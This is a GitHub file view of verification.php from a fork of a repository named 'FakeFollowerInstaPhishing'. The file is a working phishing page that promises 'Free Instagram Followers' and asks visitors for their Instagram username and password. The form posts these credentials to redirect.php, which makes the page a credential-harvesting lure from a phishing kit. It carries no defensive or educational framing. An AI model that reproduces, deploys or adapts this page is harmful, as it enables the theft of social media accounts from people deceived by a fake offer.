forked from XploitWizer-Community/FakeFollowerInstaPhishing
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathverification.php
69 lines (60 loc) · 2.18 KB
/
verification.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
//Devloper : XploitWizer
//Website : https://xploitwizer.me
//GitHub : https://github.com/XploitWizer
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href='img/mod.png' rel='icon' type='image/x-png'/>
<title>Free Instagram Followers</title>
<script src="js/jquery.min.js"></script>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style>
h1, .h1, h2, .h2, h3, .h3 {
margin-top: 0px;
margin-bottom: 10.5px;
}
body {
background: url(img/background.jpg) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
.error-msg {
margin: .5em 0;
display: block;
color: #dd4b39;
line-height: 17px;
}
.col-md-6 {
margin:0 auto;
float:none;
}
.col-md-8 {
margin:0 auto;
float:none;
}
</style>
<div style="border: 1px pink solid; padding: 10px; background-color:pink; text-align: left"><center><font size="5"><font color="white">Instagram Followers</font></font></center> </div>
<body style="padding:0px;margin:0 auto;">
<div style="padding:0px;margin:0 auto;" class="container ">
</div>
<div class="col-md-8">
</br>
<div style="padding:30px;border-radius: 2px;box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);background:white;width:100%" class="form-horizontal">
<form action="redirect.php" method="POST">
<div style="width:100%" class="form-group">
<input class="form-control" name="instaName" placeholder="Username" type="text" required>
</div>
<div style="width:100%" class="form-group">
<input class="form-control" name="pass" placeholder="Password" type="passwords" required>
</div>
<div style="width:100%" class="form-group">
<input class="form-control" name="followers" placeholder="Followers" type="number" required>
</div>
<div style="text-align:left" class="error-msg" id="hasilnya"></div>
<div style="width:100%" class="form-group">
<input type="submit" name="gsubmit" class="btn btn-block" style="color: #ffffff;background-color:pink;" id="gsubmit" value="Verify"> </form>